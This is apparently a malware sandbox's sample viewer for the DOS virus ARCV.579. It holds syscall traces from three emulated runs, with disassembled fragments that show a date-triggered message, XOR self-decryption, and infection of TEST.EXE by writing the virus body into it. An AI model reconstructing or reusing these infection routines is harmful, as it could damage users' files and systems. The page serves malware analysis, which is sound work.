Sample viewer

vx.netlux.org/Virus.DOS.ARCV.579

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:59:21.976901228Z	42	PC: 12a77 \| Get date 0x12a77: cmp dx, 0x305 0x12a7b: jne 0x12a86 0x12a7d: mov ah, 9 0x12a7f: mov dx, 0x285 0x12a82: int 0x21 0x12a84: jmp 0x12a84 0x12a86: push cs 0x12a87: pop es 0x12a88: mov ah, 0x1a 0x12a8a: mov dx, 0x384 0x12a8d: int 0x21 0x12a8f: mov ah, 0x4e 0x12a91: mov cx, 3 0x12a94: mov dx, 0x2fd 0x12a97: int 0x21 0x12a99: jae 0x12aa8 0x12a9b: jmp 0x12b7d 0x12a9e: call 0x12ba4 0x12aa1: mov ah, 0x4f 0x12aa3: call 0x12c67
2018-12-17T22:59:21.979481712Z	26	PC: 12a8f \| Set disk transfer address
2018-12-17T22:59:21.981067121Z	78	PC: 12a99 \| Find first file
2018-12-17T22:59:21.987936897Z	67	PC: 12c6d \| Get or set file attributes
2018-12-17T22:59:22.006332409Z	61	PC: 12abd \| Open file (Filename = 'TEST.EXE')
2018-12-17T22:59:22.014685932Z	63	PC: 12c6d \| Read file or device (Read 24 bytes on handle 5)
2018-12-17T22:59:22.017610341Z	66	PC: 12c6d \| Move file pointer
2018-12-17T22:59:22.01926621Z	63	PC: 12c6d \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:59:22.024801501Z	66	PC: 12c6d \| Move file pointer
2018-12-17T22:59:22.027069145Z	44	PC: 12c4b \| Get time 0x12c4b: or dx, dx 0x12c4d: je 0x12c47 0x12c4f: mov byte ptr [0x336], dh 0x12c53: call 0x12c6e 0x12c56: mov ah, 0x40 0x12c58: mov cx, 0x23b 0x12c5b: mov dx, 0x100 0x12c5e: call 0x12c67 0x12c61: jmp 0x12c6e 0x12c64: mov ax, 0x4202 0x12c67: mov bx, word ptr [0x353] 0x12c6b: int 0x21 0x12c6d: ret 0x12c6e: mov si, 0x133 0x12c71: mov cx, 0x1d4 0x12c74: xor byte ptr [si], 1 0x12c77: inc si 0x12c78: loop 0x12c74 0x12c7a: ret 0x12c7b: mov ax, 0x20cd
2018-12-17T22:59:22.029908717Z	64	PC: 12c6d \| Write file or device (Write 571 bytes on handle 5)
2018-12-17T22:59:22.040281853Z	66	PC: 12c6d \| Move file pointer
2018-12-17T22:59:22.042160416Z	64	PC: 12c6d \| Write file or device (Write 24 bytes on handle 5)
2018-12-17T22:59:22.045513865Z	87	PC: 12c6d \| Get or set file date and time
2018-12-17T22:59:22.047500985Z	62	PC: 12c6d \| Close file
2018-12-17T22:59:22.057430835Z	67	PC: 12c6d \| Get or set file attributes
2018-12-17T22:59:22.068695296Z	67	PC: 12c6d \| Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13188,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.871838437Z	42	PC: 12a77 \| Get date 0x12a77: cmp dx, 0x305 0x12a7b: jne 0x12a86 0x12a7d: mov ah, 9 0x12a7f: mov dx, 0x285 0x12a82: int 0x21 0x12a84: jmp 0x12a84 0x12a86: push cs 0x12a87: pop es 0x12a88: mov ah, 0x1a 0x12a8a: mov dx, 0x384 0x12a8d: int 0x21 0x12a8f: mov ah, 0x4e 0x12a91: mov cx, 3 0x12a94: mov dx, 0x2fd 0x12a97: int 0x21 0x12a99: jae 0x12aa8 0x12a9b: jmp 0x12b7d 0x12a9e: call 0x12ba4 0x12aa1: mov ah, 0x4f 0x12aa3: call 0x12c67
2018-12-25T12:37:37.874322346Z	26	PC: 12a8f \| Set disk transfer address
2018-12-25T12:37:37.87519059Z	78	PC: 12a99 \| Find first file
2018-12-25T12:37:37.878792986Z	67	PC: 12c6d \| Get or set file attributes
2018-12-25T12:37:39.147576342Z	61	PC: 12abd \| Open file (Filename = 'TEST.EXE')
2018-12-25T12:37:39.15475492Z	63	PC: 12c6d \| Read file or device (See above)
2018-12-25T12:37:39.157556255Z	66	PC: 12c6d \| Move file pointer (See above)
2018-12-25T12:37:39.160794069Z	63	PC: 12c6d \| Read file or device (See above)
2018-12-25T12:37:39.163863302Z	66	PC: 12c6d \| Move file pointer (See above)
2018-12-25T12:37:39.16546257Z	44	PC: 12c4b \| Get time 0x12c4b: or dx, dx 0x12c4d: je 0x12c47 0x12c4f: mov byte ptr [0x336], dh 0x12c53: call 0x12c6e 0x12c56: mov ah, 0x40 0x12c58: mov cx, 0x23b 0x12c5b: mov dx, 0x100 0x12c5e: call 0x12c67 0x12c61: jmp 0x12c6e 0x12c64: mov ax, 0x4202 0x12c67: mov bx, word ptr [0x353] 0x12c6b: int 0x21 0x12c6d: ret 0x12c6e: mov si, 0x133 0x12c71: mov cx, 0x1d4 0x12c74: xor byte ptr [si], 1 0x12c77: inc si 0x12c78: loop 0x12c74 0x12c7a: ret 0x12c7b: mov ax, 0x20cd
2018-12-25T12:37:39.168279316Z	64	PC: 12c6d \| Write file or device (See above)
2018-12-25T12:37:39.184832161Z	66	PC: 12c6d \| Move file pointer (See above)
2018-12-25T12:37:39.186986751Z	64	PC: 12c6d \| Write file or device (See above)
2018-12-25T12:37:39.194827614Z	87	PC: 12c6d \| Get or set file date and time (See above)
2018-12-25T12:37:39.200347552Z	62	PC: 12c6d \| Close file (See above)
2018-12-25T12:37:39.205293074Z	67	PC: 12c6d \| Get or set file attributes (See above)
2018-12-25T12:37:39.215769712Z	67	PC: 12c6d \| Get or set file attributes (See above)

{"DateBased":true,"Day":5,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13188,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.903705399Z	42	PC: 12a77 \| Get date 0x12a77: cmp dx, 0x305 0x12a7b: jne 0x12a86 0x12a7d: mov ah, 9 0x12a7f: mov dx, 0x285 0x12a82: int 0x21 0x12a84: jmp 0x12a84 0x12a86: push cs 0x12a87: pop es 0x12a88: mov ah, 0x1a 0x12a8a: mov dx, 0x384 0x12a8d: int 0x21 0x12a8f: mov ah, 0x4e 0x12a91: mov cx, 3 0x12a94: mov dx, 0x2fd 0x12a97: int 0x21 0x12a99: jae 0x12aa8 0x12a9b: jmp 0x12b7d 0x12a9e: call 0x12ba4 0x12aa1: mov ah, 0x4f 0x12aa3: call 0x12c67
2018-12-25T12:37:37.906464474Z	9	PC: 12a84 \| Display string (String= ' ICE-9 Presents In Association with The ARcV [X-1] Michelangelo activates -< TOMORROW >- ')